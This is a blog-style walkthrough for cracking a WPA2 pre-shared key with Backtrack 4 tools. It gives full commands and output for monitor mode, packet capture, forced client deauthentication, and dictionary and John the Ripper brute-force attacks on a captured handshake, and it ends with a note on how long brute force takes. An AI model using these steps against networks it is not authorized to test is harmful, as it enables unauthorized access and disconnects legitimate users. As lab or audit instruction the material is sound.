Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper
- Put interface in monitor mode
- Find wireless network (protected with WPA2 and a Pre Shared Key)
- Capture all packets
- Wait until you see a client and deauthenticate the client, so the handshake can be captured
- Crack the key using a dictionary file (or via John The Ripper)
First, put the card in monitor mode :
root@bt:~# airmon-ng Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] root@bt:~# airmon-ng start wlan0 Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] (monitor mode enabled on mon0)
Let’s find a wireless network that uses WPA2 / PSK :
root@bt:~# airodump-ng mon0 CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
root@bt:/# ls /tmp/wpa2* -al -rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap -rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv -rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
The first option is by using a worklist/drstionary file. A lot of these files can be found on the internet (e.g. www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the worklist and feed it the .cap fie that contains the WPA2 Handshake.
So if your wordlist is called word.lst (under /tmp/wordlists), you can run
aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.
The second method (bruteforcing) will be successfull for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng, this is the command to use :
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap
That’s it
Update :after 20 hours of cracking, the key still has not been found. The system I’m using to crack the keys is not very fast, but let’s look at some facts :
8 characters, plain characters (lowercase and uppercase) or digits = each character in the key could has 26+26+10 (62) possible combinations. So the maximum number of combinations that need to be checked in the bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 At about 600 keys per second on my “slow” system, it could take more than 101083382 hours to find the key (11539 year). I have stopped the cracking process as my machine is way too slow to crack the key while I’m still alive… So think about this when doing a WPA2 PSK Audit.
0 komentar:
Posting Komentar